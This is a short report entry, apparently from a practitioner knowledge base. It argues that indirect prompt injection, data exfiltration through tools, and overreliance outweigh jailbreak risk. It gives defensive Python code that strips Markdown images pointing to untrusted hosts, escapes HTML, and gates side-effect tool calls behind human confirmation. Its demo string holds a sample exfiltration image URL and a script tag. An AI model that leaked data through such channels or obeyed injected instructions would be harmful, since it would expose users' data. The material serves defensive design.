Report #98060
[counterintuitive] The main LLM safety risk is users tricking the model with clever jailbreak prompts
The larger operational risks are prompt injection (including indirect injection via retrieved content), data exfiltration via tool use, and overreliance on confident but wrong answers. Design your system on the assumption that ordinary inputs can produce harmful or wrong outputs.
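One way to act on the "assume outputs can be harmful" advice is to treat model output as untrusted text before it reaches a browser. The sketch below is illustrative only: the function name `sanitize_model_output`, the allowlist `ALLOWED_IMAGE_HOSTS`, and the host `cdn.example.com` are assumptions, not part of this report. It removes Markdown images that point at non-allowlisted hosts (a common exfiltration channel, since the URL can carry data in its query string) and HTML-escapes the rest.

```python
import html
import re
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the UI may load images from.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

# Matches Markdown images such as ![alt](https://host/path "title").
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def sanitize_model_output(text: str) -> str:
    """Treat model output as untrusted before rendering it in a web UI."""

    def replace_image(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if parsed.scheme == "https" and host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # keep images from trusted hosts
        # Drop the URL entirely so no request (and no data) leaves the page.
        return f"[image removed: {alt}]"

    without_untrusted_images = MD_IMAGE.sub(replace_image, text)
    # Escape any raw HTML the model emitted so it is shown, not executed.
    return html.escape(without_untrusted_images)


if __name__ == "__main__":
    risky = "Summary ![x](https://evil.test/p?d=secret) <script>alert(1)</script>"
    print(sanitize_model_output(risky))
```

This covers only one output channel. Links, file writes, and downstream parsers would each need their own checks.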
Journey Context:
Early AI safety discourse focused on jailbreaks, but production incidents increasingly involve indirect prompt injection in RAG pipelines, insecure tool calling, and agents that act on attacker-controlled data. The OWASP Top 10 for LLM Applications reflects this: it lists prompt injection, insecure output handling, and excessive agency as distinct risks, and treats jailbreaking as one form of prompt injection rather than a category of its own. The practical takeaway: harden the control plane and output channels, not just the model's refusal behavior.
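As a rough illustration of hardening the control plane, the sketch below places a policy check between the model's requested tool call and its execution. Everything here is hypothetical: the `ToolCall` type, the tool names, and the `tainted` flag (which assumes the application can track whether retrieved or third-party content influenced the request) are assumptions made for the example, not an API from any particular framework.

```python
from dataclasses import dataclass, field


@dataclass
class ToolCall:
    name: str
    args: dict = field(default_factory=dict)
    # Assumption: the app sets this when the request was produced while
    # retrieved or other third-party content was in the model's context.
    tainted: bool = False


# Hypothetical policy tables; a real system would load these from config.
READ_ONLY_TOOLS = {"search_docs", "get_weather"}
SIDE_EFFECT_TOOLS = {"send_email", "delete_file"}


def authorize(call: ToolCall, user_confirmed: bool = False) -> str:
    """Return 'allow', 'needs_confirmation', or 'deny' for a tool call."""
    if call.name in READ_ONLY_TOOLS:
        return "allow"
    if call.name in SIDE_EFFECT_TOOLS:
        # Side effects requested under attacker-influenceable context
        # require an explicit human confirmation first.
        if call.tainted and not user_confirmed:
            return "needs_confirmation"
        return "allow"
    # Default-deny anything not explicitly listed.
    return "deny"


if __name__ == "__main__":
    call = ToolCall("send_email", {"to": "someone@example.com"}, tainted=True)
    print(authorize(call))
```

The design choice is that the decision does not depend on the model refusing anything: an injected instruction can still make the model request `send_email`, but the request stalls at the gate until a person confirms it.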
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-26T05:09:33.867178+00:00— report_created — created